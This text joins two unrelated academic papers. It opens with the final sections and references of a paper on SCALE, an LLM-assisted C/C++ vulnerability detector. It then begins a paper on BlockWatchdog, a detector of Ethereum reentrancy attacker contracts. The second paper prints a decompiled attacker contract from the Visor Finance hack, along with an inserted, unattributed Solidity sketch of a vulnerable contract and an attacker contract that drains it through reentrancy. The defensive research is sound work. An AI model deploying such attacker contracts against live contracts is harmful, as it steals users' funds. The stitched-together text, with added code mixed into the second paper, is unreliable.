…GPT3.5-instruct and ChatGPT are capable of producing effective comments for the construction of SCTs. Specifically, the SCTs created by GPT3.5-instruct demonstrated an enhancement in Precision and F1 score, showing improvements of 5.49% and 1.98%, respectively, over the best-performing baseline CodeT5, as shown in Table 3. In a comparative analysis with SCTs generated by ChatGPT, the results of GPT3.5-instruct are comparably effective: they exhibit superiority in recall and F1 score, whereas ChatGPT performs better on the accuracy and precision metrics.

These findings suggest that employing different large language models (LLMs) for comment generation on source code aids in improving the pre-trained model's comprehension, thereby enhancing the effectiveness of vulnerability detection.

6.2 Threats to Validity

Generalizability to Other Programming Languages. In this paper, we employ the tree-sitter library to parse ASTs for the C/C++ programming languages. As a result, our experimental analysis focuses solely on C/C++ datasets, excluding other popular languages such as Java and Python. In future research, we intend to evaluate the efficacy of SCALE on a broader range of programming languages.

Constraints of Domain Knowledge in Structured Natural Language Rules. For the context of the C/C++ language reference, SCALE offers eleven structured natural language rules to facilitate the correlation between code and its associated comments. Although these rules are comprehensive enough in most cases, they still cannot cover some statements, such as expression statements. This limitation could potentially introduce biases into the model's predictions. A potential resolution would be to involve more types of AST nodes to broaden the structured natural language rules, thereby enabling a more thorough integration of comment information.

Experiments on larger pre-trained models. In this experiment, we evaluate SCALE on three pre-trained models. These models are all representative and have shown state-of-the-art performance on benchmarks. However, the size of these models is less than 1B parameters. In the future, we plan to validate the effectiveness of SCALE on larger LLMs such as CodeLlama [47].

REFERENCES
[1] 2023. C/C++ Language Reference. …language-reference?view=msvc-170
[2] 2023. CVE. https://cve.mitre.org/
[3] 2023. OpenAI. https://platform.openai.com/docs/guides/gpt-best-practices
[4] 2023. Qemu. https://www.qemu.org/
[5] 2023. Tree-sitter. https://tree-sitter.github.io/tree-sitter/
[6] [n.d.]. Rough Audit Tool for Security. https://code.google.com/archive/p/rough-auditing-tool-for-security.
[7] Roberto Baldoni, Emilio Coppa, Daniele Cono D'Elia, Camil Demetrescu, and Irene Finocchi. 2018. A Survey of Symbolic Execution Techniques. ACM Comput. Surv. 51, 3 (2018), 50:1-50:39.
[8] Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D. Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. 2020. Language Models are Few-Shot Learners. In Advances in Neural Information Processing Systems 33 (NeurIPS 2020).
[9] Sicong Cao, Xiaobing Sun, Lili Bo, Ying Wei, and Bin Li. 2021. BGNN4VD: Constructing Bidirectional Graph Neural-Network for Vulnerability Detection. Inf. Softw. Technol. 136 (2021), 106576.
[10] Saikat Chakraborty, Rahul Krishna, Yangruibo Ding, and Baishakhi Ray. 2020. Deep Learning based Vulnerability Detection: Are We There Yet? CoRR abs/2009.07235 (2020).
[11] ChatGPT. 2022. ChatGPT. https://chat.openai.com/.
[12] Chun-Fu (Richard) Chen, Quanfu Fan, and Rameswar Panda. 2021. CrossViT: Cross-Attention Multi-Scale Vision Transformer for Image Classification. In ICCV 2021. IEEE, 347-356.
[13] Xiao Cheng, Xu Nie, Ningke Li, Haoyu Wang, Zheng Zheng, and Yulei Sui. 2022. How About Bug-Triggering Paths? - Understanding and Characterizing Learning-Based Vulnerability Detectors. IEEE Transactions on Dependable and Secure Computing (2022).
[14] Roland Croft, Muhammad Ali Babar, and M. Mehdi Kholoosi. 2023. Data Quality for Software Vulnerability Datasets. CoRR abs/2301.05456 (2023).
[15] Pieter-Tjerk de Boer, Dirk P. Kroese, Shie Mannor, and Reuven Y. Rubinstein. 2005. A Tutorial on the Cross-Entropy Method. Ann. Oper. Res. 134, 1 (2005), 19-67.
[16] Facebook. [n.d.]. Infer. https://fbinfer.com/.
[17] Jiahao Fan, Yi Li, Shaohua Wang, and Tien N. Nguyen. 2020. A C/C++ Code Vulnerability Dataset with Code Changes and CVE Summaries. In MSR '20: 17th International Conference on Mining Software Repositories. ACM, 508-512.
[18] Zhangyin Feng, Daya Guo, Duyu Tang, Nan Duan, Xiaocheng Feng, Ming Gong, Linjun Shou, Bing Qin, Ting Liu, Daxin Jiang, and Ming Zhou. 2020. CodeBERT: A Pre-Trained Model for Programming and Natural Languages. In Findings of the Association for Computational Linguistics: EMNLP 2020. ACL, 1536-1547.
[19] Daniel Fried, Armen Aghajanyan, Jessy Lin, Sida Wang, Eric Wallace, Freda Shi, Ruiqi Zhong, Wen-tau Yih, Luke Zettlemoyer, and Mike Lewis. 2022. InCoder: A Generative Model for Code Infilling and Synthesis. CoRR abs/2204.05999 (2022).
[20] Michael Fu and Chakkrit Tantithamthavorn. 2022. LineVul: A Transformer-based Line-Level Vulnerability Prediction. In MSR. ACM, 608-620.
[21] Michael Fu, Chakkrit Tantithamthavorn, Van Nguyen, and Trung Le. 2023. ChatGPT for Vulnerability Detection, Classification, and Repair: How Far Are We? CoRR abs/2310.09810 (2023).
[22] Shuzheng Gao, Wenxin Mao, Cuiyun Gao, Li Li, Xing Hu, Xin Xia, and Michael R. Lyu. 2024. Learning in the Wild: Towards Leveraging Unlabeled Data for Effectively Tuning Pre-trained Code Models. CoRR abs/2401.01060 (2024).
[23] Shuzheng Gao, Xin-Cheng Wen, Cuiyun Gao, Wenxuan Wang, Hongyu Zhang, and Michael R. Lyu. 2023. What Makes Good In-Context Demonstrations for Code Intelligence Tasks with LLMs?. In ASE 2023. IEEE, 761-773.
[24] GPT3.5-instruct. 2022. GPT3.5-instruct. https://platform.openai.com/docs/models.
[25] Daya Guo, Shuai Lu, Nan Duan, Yanlin Wang, Ming Zhou, and Jian Yin. 2022. UniXcoder: Unified Cross-Modal Pre-training for Code Representation. In ACL 2022. ACL, 7212-7225.
[26] Daya Guo, Shuo Ren, Shuai Lu, Zhangyin Feng, Duyu Tang, Shujie Liu, Long Zhou, Nan Duan, Alexey Svyatkovskiy, Shengyu Fu, Michele Tufano, Shao Kun Deng, Colin B. Clement, Dawn Drain, Neel Sundaresan, Jian Yin, Daxin Jiang, and Ming Zhou. 2021. GraphCodeBERT: Pre-training Code Representations with Data Flow. In ICLR 2021. OpenReview.net.
[27] Tong He, Weilin Huang, Yu Qiao, and Jian Yao. 2016. Text-Attentional Convolutional Neural Network for Scene Text Detection. IEEE Trans. Image Process. 25, 6 (2016), 2529-2541.
[28] Xinyi Hou, Yanjie Zhao, Yue Liu, Zhou Yang, Kailong Wang, Li Li, Xiapu Luo, David Lo, John C. Grundy, and Haoyu Wang. 2023. Large Language Models for Software Engineering: A Systematic Literature Review. CoRR abs/2308.10620 (2023).
[29] Hugging Face. 2023. Hugging Face Hub. https://huggingface.co/.
[30] IBM. 2023. Cost of a Data Breach Report 2023. https://www.ibm.com/reports/data-breach
[31] Israel. [n.d.]. Checkmarx. https://www.checkmarx.com/.
[32] Hongzhe Li, Taebeom Kim, Munkhbayar Bat-Erdene, and Heejo Lee. 2013. Software Vulnerability Detection Using Backward Trace Analysis and Symbolic Execution. In ARES 2013. IEEE Computer Society, 446-454.
[33] Raymond Li, Loubna Ben Allal, Yangtian Zi, Niklas Muennighoff, Denis Kocetkov, Chenghao Mou, Marc Marone, Christopher Akiki, Jia Li, Jenny Chim, Qian Liu, Evgenii Zheltonozhskii, Terry Yue Zhuo, Thomas Wang, Olivier Dehaene, Mishig Davaadorj, Joel Lamy-Poirier, João Monteiro, Oleh Shliazhko, Nicolas Gontier, Nicholas Meade, Armel Zebaze, Ming-Ho Yee, Logesh Kumar Umapathi, Jian Zhu, Benjamin Lipkin, Muhtasham Oblokulov, Zhiruo Wang, Rudra Murthy V, Jason Stillerman, Siva Sankalp Patel, Dmitry Abulkhanov, Marco Zocca, Manan Dey, Zhihan Zhang, Nour Moustafa-Fahmy, Urvashi Bhattacharyya, Wenhao Yu, Swayam Singh, Sasha Luccioni, Paulo Villegas, Maxim Kunakov, Fedor Zhdanov, Manuel Romero, Tony Lee, Nadav Timor, Jennifer Ding, Claire Schlesinger, Hailey Schoelkopf, Jan Ebert, Tri Dao, Mayank Mishra, Alex Gu, Jennifer Robinson, Carolyn Jane Anderson, Brendan Dolan-Gavitt, Danish Contractor, Siva Reddy, Daniel Fried, Dzmitry Bahdanau, Yacine Jernite, Carlos Muñoz Ferrandis, Sean Hughes, Thomas Wolf, Arjun Guha, Leandro von Werra, and Harm de Vries. 2023. StarCoder: may the source be with you! CoRR abs/2305.06161 (2023).
[34] Wen Li, Haipeng Cai, Yulei Sui, and David Manz. 2020. PCA: memory leak detection using partial call-path analysis. In ESEC/FSE 2020. ACM, 1621-1625.
[35] Yue Li, Tian Tan, Anders Møller, and Yannis Smaragdakis. 2018. Precision-guided context sensitivity for pointer analysis. Proc. ACM Program. Lang. 2, OOPSLA (2018), 141:1-141:29.
[36] Yue Li, Tian Tan, Anders Møller, and Yannis Smaragdakis. 2020. A Principled Approach to Selective Context Sensitivity for Pointer Analysis. ACM Trans. Program. Lang. Syst. 42, 2 (2020), 10:1-10:40.
[37] Yi Li, Shaohua Wang, and Tien N. Nguyen. 2021. Vulnerability detection with fine-grained interpretations. In ESEC/SIGSOFT FSE. ACM, 292-303.
[38] Zhen Li, Deqing Zou, Shouhuai Xu, Hai Jin, Yawei Zhu, and Zhaoxuan Chen. 2022. SySeVR: A Framework for Using Deep Learning to Detect Software Vulnerabilities. IEEE Trans. Dependable Secur. Comput. 19, 4 (2022), 2244-2258.
[39] Zhen Li, Deqing Zou, Shouhuai Xu, Xinyu Ou, Hai Jin, Sujuan Wang, Zhijun Deng, and Yuyi Zhong. 2018. VulDeePecker: A Deep Learning-Based System for Vulnerability Detection. In NDSS 2018. The Internet Society.
[40] Jiachang Liu, Dinghan Shen, Yizhe Zhang, Bill Dolan, Lawrence Carin, and Weizhu Chen. 2022. What Makes Good In-Context Examples for GPT-3?. In Proceedings of Deep Learning Inside Out: The 3rd Workshop on Knowledge Extraction and Integration for Deep Learning Architectures (DeeLIO@ACL 2022). ACL, 100-114.
[41] Shuai Lu, Daya Guo, Shuo Ren, Junjie Huang, Alexey Svyatkovskiy, Ambrosio Blanco, Colin B. Clement, Dawn Drain, Daxin Jiang, Duyu Tang, Ge Li, Lidong Zhou, Linjun Shou, Long Zhou, Michele Tufano, Ming Gong, Ming Zhou, Nan Duan, Neel Sundaresan, Shao Kun Deng, Shengyu Fu, and Shujie Liu. 2021. CodeXGLUE: A Machine Learning Benchmark Dataset for Code Understanding and Generation. In NeurIPS Datasets and Benchmarks 2021.
[42] Gary McGraw and Bruce Potter. 2004. Software Security Testing. IEEE Secur. Priv. 2, 5 (2004), 81-85.
[43] Chao Ni, Xin Yin, Kaiwen Yang, Dehai Zhao, Zhenchang Xing, and Xin Xia. 2023. Distinguishing Look-Alike Innocent and Vulnerable Code by Subtle Semantic Representation Learning and Explanation. CoRR abs/2308.11237 (2023).
[44] OpenAI. 2023. GPT-4 Technical Report. CoRR abs/2303.08774 (2023).
[45] Yun Peng, Chaozheng Wang, Wenxuan Wang, Cuiyun Gao, and Michael R. Lyu. 2023. Generative Type Inference for Python. CoRR abs/2307.09163 (2023).
[46] Ben Prystawski and Noah D. Goodman. 2023. Why think step-by-step? Reasoning emerges from the locality of experience. CoRR abs/2304.03843 (2023).
[47] Baptiste Rozière, Jonas Gehring, Fabian Gloeckle, Sten Sootla, Itai Gat, Xiaoqing Ellen Tan, Yossi Adi, Jingyu Liu, Tal Remez, Jérémy Rapin, Artyom Kozhevnikov, Ivan Evtimov, Joanna Bitton, Manish Bhatt, Cristian Canton-Ferrer, Aaron Grattafiori, Wenhan Xiong, Alexandre Défossez, Jade Copet, Faisal Azhar, Hugo Touvron, Louis Martin, Nicolas Usunier, Thomas Scialom, and Gabriel Synnaeve. 2023. Code Llama: Open Foundation Models for Code. CoRR abs/2308.12950 (2023).
[48] Rebecca L. Russell, Louis Y. Kim, Lei H. Hamilton, Tomo Lazovich, Jacob Harer, Onur Ozdemir, Paul M. Ellingwood, and Marc W. McConley. 2018. Automated Vulnerability Detection in Source Code Using Deep Representation Learning. In ICMLA. IEEE, 757-762.
[49] Statista. 2023. Common IT vulnerabilities and exposures worldwide 2009-2023. https://www.statista.com/statistics/
[50] Yulei Sui, Ding Ye, and Jingling Xue. 2012. Static memory leak detection using full-sparse value-flow analysis. In ISSTA 2012. ACM, 254-264.
[51] Hugo Touvron, Thibaut Lavril, Gautier Izacard, Xavier Martinet, Marie-Anne Lachaux, Timothée Lacroix, Baptiste Rozière, Naman Goyal, Eric Hambro, Faisal Azhar, Aurélien Rodriguez, Armand Joulin, Edouard Grave, and Guillaume Lample. 2023. LLaMA: Open and Efficient Foundation Language Models. CoRR abs/2302.13971 (2023).
[52] Hugo Touvron, Louis Martin, Kevin Stone, Peter Albert, Amjad Almahairi, Yasmine Babaei, Nikolay Bashlykov, Soumya Batra, Prajjwal Bhargava, Shruti Bhosale, Dan Bikel, Lukas Blecher, Cristian Canton-Ferrer, Moya Chen, Guillem Cucurull, David Esiobu, Jude Fernandes, Jeremy Fu, Wenyin Fu, Brian Fuller, Cynthia Gao, Vedanuj Goswami, Naman Goyal, Anthony Hartshorn, Saghar Hosseini, Rui Hou, Hakan Inan, Marcin Kardas, Viktor Kerkez, Madian Khabsa, Isabel Kloumann, Artem Korenev, Punit Singh Koura, Marie-Anne Lachaux, Thibaut Lavril, Jenya Lee, Diana Liskovich, Yinghai Lu, Yuning Mao, Xavier Martinet, Todor Mihaylov, Pushkar Mishra, Igor Molybog, Yixin Nie, Andrew Poulton, Jeremy Reizenstein, Rashi Rungta, Kalyan Saladi, Alan Schelten, Ruan Silva, Eric Michael Smith, Ranjan Subramanian, Xiaoqing Ellen Tan, Binh Tang, Ross Taylor, Adina Williams, Jian Xiang Kuan, Puxin Xu, Zheng Yan, Iliyan Zarov, Yuchen Zhang, Angela Fan, Melanie Kambadur, Sharan Narang, Aurélien Rodriguez, Robert Stojnic, Sergey Edunov, and Thomas Scialom. 2023. Llama 2: Open Foundation and Fine-Tuned Chat Models. CoRR abs/2307.09288 (2023).
[53] Lilapati Waikhom and Ripon Patgiri. 2023. A survey of graph neural networks in various learning paradigms: methods, applications, and challenges. Artif. Intell. Rev. 56, 7 (2023), 6295-6364.
[54] Xiaomeng Wang, Tao Zhang, Runpu Wu, Wei Xin, and Changyu Hou. 2018. CPGVA: Code Property Graph based Vulnerability Analysis by Deep Learning. In ICAIT 2018. IEEE, 184-188.
[55] Yue Wang, Weishi Wang, Shafiq R. Joty, and Steven C. H. Hoi. 2021. CodeT5: Identifier-aware Unified Pre-trained Encoder-Decoder Models for Code Understanding and Generation. In EMNLP 2021. ACL, 8696-8708.
[56] Jason Wei, Xuezhi Wang, Dale Schuurmans, Maarten Bosma, Brian Ichter, Fei Xia, Ed H. Chi, Quoc V. Le, and Denny Zhou. 2022. Chain-of-Thought Prompting Elicits Reasoning in Large Language Models. In NeurIPS.
[57] Xin-Cheng Wen, Yupan Chen, Cuiyun Gao, Hongyu Zhang, Jie M. Zhang, and Qing Liao. 2023. Vulnerability Detection with Graph Simplification and Enhanced Graph Representation Learning. In ICSE 2023. IEEE, 2275-2286.
[58] Xin-Cheng Wen, Cuiyun Gao, Jiaxin Ye, Zhihong Tian, Yan Jia, and Xuan Wang. 2022. Meta-Path Based Attentional Graph Learning Model for Vulnerability Detection. CoRR abs/2212.14274 (2022).
[59] Xin-Cheng Wen, Xinchen Wang, Cuiyun Gao, Shaohua Wang, Yang Liu, and Zhaoquan Gu. 2023. When Less is Enough: Positive and Unlabeled Learning Model for Vulnerability Detection. (2023), 345-357.
[60] David A. Wheeler. [n.d.]. Flawfinder. https://dwheeler.com/flawfinder/
[61] Fang Wu, Jigang Wang, Jiqiang Liu, and Wei Wang. 2017. Vulnerability detection with deep learning. In ICCC 2017. IEEE, 1298-1302.
[62] Yueming Wu, Deqing Zou, Shihan Dou, Wei Yang, Duo Xu, and Hai Jin. 2022. VulCNN: An Image-inspired Scalable Vulnerability Detection System. In ICSE 2022. ACM, 2365-2376.
[63] Junwei Zhang, Zhongxin Liu, Xing Hu, Xin Xia, and Shanping Li. 2023. Vulnerability Detection by Learning From Syntax-Based Execution Paths of Code. IEEE Trans. Software Eng. 49, 8 (2023), 4196-4212.
[64] Qinkai Zheng, Xiao Xia, Xu Zou, Yuxiao Dong, Shan Wang, Yufei Xue, Zihan Wang, Lei Shen, Andi Wang, Yang Li, et al. 2023. CodeGeeX: A Pre-Trained Model for Code Generation with Multilingual Evaluations on HumanEval-X. CoRR abs/2303.17568 (2023).
[65] Yaqin Zhou, Shangqing Liu, Jing Kai Siow, Xiaoning Du, and Yang Liu. 2019. Devign: Effective Vulnerability Identification by Learning Comprehensive Program Semantics via Graph Neural Networks. In NeurIPS 2019. 10197-10207.
Uncover the Premeditated Attacks: Detecting Exploitable Reentrancy Vulnerabilities by Identifying Attacker Contracts

Shuo Yang, Jiachi Chen*, Mingyuan Huang, Zibin Zheng, and Yuan Huang
Sun Yat-sen University, Zhuhai, China
yangsh233@mail2.sysu.edu.cn, chenjch86@mail.sysu.edu.cn, huangmy83@mail2.sysu.edu.cn, zhzibin@mail.sysu.edu.cn, huangyuan5@mail.sysu.edu.cn
*Corresponding author.

ABSTRACT
Reentrancy, a notorious vulnerability in smart contracts, has led to millions of dollars in financial loss. However, current smart contract vulnerability detection tools suffer from a high false positive rate in identifying contracts with reentrancy vulnerabilities. Moreover, only a small portion of the detected reentrant contracts can actually be exploited by hackers, making these tools less effective in securing the Ethereum ecosystem in practice.

In this paper, we propose BlockWatchdog, a tool that focuses on detecting reentrancy vulnerabilities by identifying attacker contracts. These attacker contracts are deployed by hackers to exploit vulnerable contracts automatically. By focusing on attacker contracts, BlockWatchdog effectively detects truly exploitable reentrancy vulnerabilities by identifying reentrant call flow. Additionally, BlockWatchdog is capable of detecting new types of reentrancy vulnerabilities caused by poor designs when using ERC tokens or user-defined interfaces, which cannot be detected by current rule-based tools. We implement BlockWatchdog using cross-contract static dataflow techniques based on attack logic obtained from an empirical study that analyzes attacker contracts from 281 attack incidents. BlockWatchdog is evaluated on 421,889 Ethereum contract bytecodes and identifies 113 attacker contracts that target 159 victim contracts, leading to the theft of Ether and tokens valued at approximately 908.6 million USD. Notably, only 18 of the identified 159 victim contracts can be reported by current reentrancy detection tools.

CCS CONCEPTS
• Software and its engineering → Software verification and validation.

KEYWORDS
Smart Contract; Dataflow Analysis; Reentrancy; Attacker Identification; Ethereum

ACM Reference Format:
Shuo Yang, Jiachi Chen, Mingyuan Huang, Zibin Zheng, and Yuan Huang. 2024. Uncover the Premeditated Attacks: Detecting Exploitable Reentrancy Vulnerabilities by Identifying Attacker Contracts. In 2024 IEEE/ACM 46th International Conference on Software Engineering (ICSE '24), April 14-20, 2024, Lisbon, Portugal. ACM, New York, NY, USA, 12 pages. https://doi.org/10.1145/3597503.3639153

1 INTRODUCTION
In recent years, Ethereum has experienced significant growth in popularity and market cap [15], primarily due to its ability to support a wide range of decentralized applications (DApps) [55], such as decentralized finance (DeFi) [53] and non-fungible tokens (NFTs) [57]. This is made possible through the use of smart contracts [59], which are Turing-complete programs that run on the blockchain. However, as the value of Ethereum continues to rise, attackers are increasingly targeting contracts with vulnerabilities that can be exploited to make unfair profits. Reentrancy is one of the infamous vulnerabilities; it has caused huge financial losses [60] since the 150 million USD DAO attack in 2016 [25], and new reentrancy attacks keep popping up in more and more complex forms. For example, an attacker exploited a reentrancy vulnerability to drain approximately 1,300 ETH (1.43 million USD) from the NFT money market platform called Omni [1] by using the hook function onERC721Received() declared in the ERC721 standard [18].
Numerous studies have focused on detecting vulnerabilities in smart contracts [16, 23, 28], proposing various methods such as static analysis and dynamic testing to identify potential issues. However, these works face two main limitations. First, there is a high false-positive rate in detecting reentrancy vulnerabilities [60], as they cannot correctly detect some protection patterns. Furthermore, these methods mainly focus on reentrancy caused by call.value() operations, which cannot cover more complex reentrancy vulnerabilities (leading to false negatives) caused by poor designs when using standard ERC tokens, e.g., ERC721, or user-defined interfaces (see Section 2.2). Second, only 2.68% of contracts with reentrancy vulnerabilities can truly be exploited by hackers, and only 0.4% of the Ethers at stake could be exploited [35].
Real-world attackers intend to evaluate the cost and benefit of an attack, but most contracts do not have a balance that can be extracted. Specifically, on Ethereum, only 3% of the contracts have a non-zero balance. Thus, most of the vulnerable contracts labeled by the tools cannot be exploited and are false alarms, which makes these tools less effective in securing the Ethereum ecosystem in practice.

Exploiting reentrancy vulnerabilities requires deploying malicious contracts that initiate callbacks to the victim contract. In this paper, we shift our focus from vulnerability detection to analyzing attacker contracts. To investigate how attackers implement callback logic on victims, we conduct an empirical study by analyzing 281 attack incident reports from various platforms, e.g., Twitter [49], Medium [2], and Peckshield [34], spanning from June 2016 to July 2022. These platforms provide comprehensive and timely descriptions of attack incidents, which are also adopted by other works [57]. Consequently, we summarize three types of reentrancy attacks based on the functions that attacker contracts use to make callbacks (see Section 3). Furthermore, we propose BlockWatchdog, a tool that utilizes cross-contract static dataflow techniques to identify reentrancy attacker contracts. First, BlockWatchdog decompiles the contract's bytecode to an intermediate representation (IR) and extracts flow and external call information in the functions. Second, BlockWatchdog identifies the contracts in the call chain and constructs the cross-contract control flow graph (xCFG) and the cross-contract call graph (xCG) of the contract based on dataflow rules. Then, it traces all call chains to perform a taint analysis to determine whether the attacker can manipulate the call chain, making itself called again to implement reentrancy. Based on detection patterns designed in combination with external call and dataflow information, BlockWatchdog reports whether the contract is an attacker contract and identifies the vulnerable victim contracts.

In the experiment, we first evaluate BlockWatchdog on our collected ground-truth dataset, which contains 18 reentrancy attacker contracts. Then, we run BlockWatchdog on a real-world dataset containing 421,889 contracts' bytecodes obtained by replaying transactions from block number 10 million to 15.5 million on the Ethereum mainnet. Its average detection time is 17.66 seconds. Furthermore, BlockWatchdog identifies 249 attacker smart contracts in this dataset, and 113 of them are labeled as true positives. Among them, 40 are 0-day attacker contracts, which involve 159 victim contracts. Ethers and tokens worth approximately 908.6 million USD in these contracts have been stolen by attackers. Furthermore, we run seven tools for reentrancy vulnerability detection on the identified victim contracts; only 18 (11.3%) of them can be correctly reported.

The main contributions of our work are as follows.
• We shift the detection focus from vulnerable contracts to attacker contracts, which alleviates the high false positive problem and the limited capability of current tools in finding reentrancy.
• We summarize three types of reentrancy attacks from an empirical study and introduce BlockWatchdog, a cross-contract static dataflow analysis tool to find attacker contracts and the vulnerable victim contracts they target. Additionally, BlockWatchdog is extensible for users to program more rules to cover new attack types.
• We evaluate the performance of BlockWatchdog on a dataset consisting of 421,889 contracts' bytecode. Our experiments show that BlockWatchdog identifies 113 attacker contracts and 159 victim contracts, which hold Ethers and tokens worth approximately 908.6 million USD. Only 18 of the 159 victims can be detected by current tools. We publicize the source code of BlockWatchdog and the experimental results in our repository¹.

¹https://github.com/shuo-young/BlockWatchdog

2 BACKGROUND AND MOTIVATION

2.1 Solidity Smart Contracts
A smart contract is a self-executing agreement that is enforced by the rules encoded in its code [46]. Solidity is the most popular programming language for smart contracts on Ethereum. The bytecode and transactions of deployed smart contracts are permanently stored on the blockchain [59]. The immutability of smart contracts ensures that their code and behavior cannot be modified once deployed, and they execute automatically based on their predefined logic. The Ethereum Virtual Machine (EVM) is a stack-based virtual machine that executes transactions by splitting the EVM bytecode into operation codes (opcodes) and following their instructions.

2.2 Reentrancy
The reentrancy vulnerability has resulted in significant financial losses over the past few years. Many works focus on detecting reentrancies caused by the call.value() pattern [60]. Solidity smart contracts have a unique mechanism that requires any contract that receives Ethers to implement a fallback function. The fallback function will be executed if the contract receives Ether from other addresses. If the victim contract transfers Ethers to the malicious attacker contract, the malicious one can take over the control flow and repetitively call the victim in its fallback function.
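This classic fallback-driven pattern is not spelled out in code in the paper; the following is a minimal sketch (not from the paper, with hypothetical Vulnerable/Attacker names) of how a fallback function takes over the control flow during an Ether transfer.

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    // Hypothetical victim: sends Ether before updating its bookkeeping,
    // so the recipient's fallback code can re-enter withdraw().
    contract Vulnerable {
        mapping(address => uint256) public balances;

        function deposit() external payable {
            balances[msg.sender] += msg.value;
        }

        function withdraw() external {
            uint256 amount = balances[msg.sender];
            // External call happens before the state update (the bug).
            (bool ok, ) = msg.sender.call{value: amount}("");
            require(ok, "transfer failed");
            balances[msg.sender] = 0;
        }
    }

    // Hypothetical attacker contract: receive() runs whenever the victim
    // sends it Ether, handing control back to the attacker mid-withdraw.
    contract Attacker {
        Vulnerable private victim;

        constructor(Vulnerable _victim) payable {
            victim = _victim;
        }

        function attack() external {
            victim.deposit{value: 1 ether}();
            victim.withdraw();
        }

        receive() external payable {
            // Re-enter while the victim's balance entry is still non-zero.
            if (address(victim).balance >= 1 ether) {
                victim.withdraw();
            }
        }
    }

Each nested withdraw() pays out again before the first invocation ever reaches the state update, which is exactly the control-flow takeover described above.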
Many attackers have exploited this fallback mechanism to drain funds from victims. Beyond those caused by call.value(), there are some new reentrancy types. For example, Lendf.Me [24] and Omni [1] were attacked through the poor design of using ERC777 [14] and ERC721 [18] tokens, respectively.

In addition, poor design when using user-defined interfaces can also lead to reentrancy issues. Figure 1 shows the attacker contract that hacked 8.2 million USD through a reentrancy attack on Visor [19], a liquidity management protocol of Uniswap V3 [51]. The function delegatedTransferERC20() (L25) is defined by the developers and is not declared in any ERC token standard. The attacker contract injects external calls into the function delegatedTransferERC20() (L13-L17) invoked by the victim contract RewardsHypervisor (L20). In detail, the attacker contract invokes the function deposit() (L8) of the contract RewardsHypervisor. Then, RewardsHypervisor calls the delegatedTransferERC20() (L25) of contract from, which is set by the attacker contract to address(this), i.e., the attacker contract itself (L25). However, the attacker makes a callback to RewardsHypervisor to deposit again on line 8, which makes it suffer from a reentrancy vulnerability. The contract RewardsHypervisor does not contain the call.value() reentrancy vulnerability type, which current detection tools focus on. Yet, it was still attacked by the malicious attacker contract to make unfair gains due to the bad design when using the user-defined interface delegatedTransferERC20().

    1  // the decompiled IR of the attacker contract bytecode
    2  contract Attacker {
    3      function 0x4a0b0c38() public payable {
    4          0x28e();}
    5
    6      function 0x28e() private {
    7          require(_pool.code.size);
    8          v0, v1 = _pool.deposit(0x52b7d2dcc80cd2e4000000, address(this), _admin);
    9          require(v0);
    10         require(RETURNDATASIZE() >= 32);
    11         return ;}
    12
    13     function delegatedTransferERC20(address varg0, address varg1, uint256 varg2) public payable {
    14         require(msg.data.length - 4 >= 96);
    15         _count += 1;
    16         if (_count < 2) {
    17             0x28e();}}
    18 }
    19 // the source code of the victim contract
    20 contract RewardsHypervisor {
    21     function deposit(uint256 visrDeposit, address payable from, address to) external returns (uint256 shares) {
    22         ...
    23         if(isContract(from)) {
    24             require(IVisor(from).owner() == msg.sender);
    25             IVisor(from).delegatedTransferERC20(address(visr), address(this), visrDeposit);}
    26         else {
    27             visr.safeTransferFrom(from, address(this), visrDeposit);}
    28         vvisr.mint(to, shares);}
    29 }

Figure 1: Reentrancy attack toward Visor Finance.
2.3 Prior Research and Their Limitations
Unexploitability of the detected contracts. Previous research has focused on detecting reentrancy vulnerabilities, but most of the detected contracts are either toy contracts with no value or cannot be exploited by attackers [35]. Specifically, only 1.98% of the 23,327 reported vulnerable contracts from six academic projects have been exploited since deployment, affecting only 0.27% of the funds in the contracts [16, 21, 23, 28, 32, 48]. The reason is that the majority of Ether or tokens are held by only a small number of vulnerable contracts, which are lucrative for hackers, making most of the detected contracts unexploitable. However, detecting attacker contracts can help identify truly exploitable yet vulnerable contracts.

Poor performance in detecting reentrancy. Existing reentrancy detection tools have an extremely high false positive rate. More than 99.8% of the reentrant contracts detected by the tools [7, 28, 29, 39, 48] are false positives [60], as these tools do not detect some protection patterns, such as the reentrancy lock. To reduce false positives, detecting attacker contracts can help find those hackers who aim at truly exploitable contracts without reentrancy protections. Furthermore, existing tools cannot cover new types of reentrancies caused by poor design when using ERC tokens, which can result in false negatives. This is because rule-based tools have limited scalability, as each rule can only check a specific reentrancy type (e.g., reentrancy caused by call.value()) and cannot cover emerging types, such as new ERC standards [33] (e.g., reentrancy caused by ERC721 and ERC1155 [13]), or user-defined interfaces, e.g., delegatedTransferERC20() in Figure 1.

To address these limitations, a more general detection method is needed to reduce both false positives and false negatives. Reentrancy vulnerabilities are mainly characterized by the mutual invocation of the victim contract and the attacker contract with callback flow features, but victim contracts contain limited and non-homogeneous information, making it challenging to summarize a generic signature for rule-based tools. This motivates us to recover reentrancy features from the perspective of attacker contracts.
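The "reentrancy lock" protection pattern mentioned above is not shown in the paper; it is typically a simple mutex modifier, similar in spirit to OpenZeppelin's ReentrancyGuard. A minimal sketch:

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    // Minimal mutex-style reentrancy lock. A guarded function cannot be
    // re-entered while the lock is held, so a callback-based attack on
    // withdraw() reverts even though the external call still precedes
    // the state update.
    contract Guarded {
        bool private locked;
        mapping(address => uint256) public balances;

        modifier nonReentrant() {
            require(!locked, "reentrant call");
            locked = true;
            _;
            locked = false;
        }

        function deposit() external payable {
            balances[msg.sender] += msg.value;
        }

        function withdraw() external nonReentrant {
            uint256 amount = balances[msg.sender];
            (bool ok, ) = msg.sender.call{value: amount}("");
            require(ok, "transfer failed");
            balances[msg.sender] = 0;
        }
    }

A detector that only pattern-matches "external call before state update" still flags withdraw() here even though the lock blocks exploitation, which is precisely the false-positive source described above.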
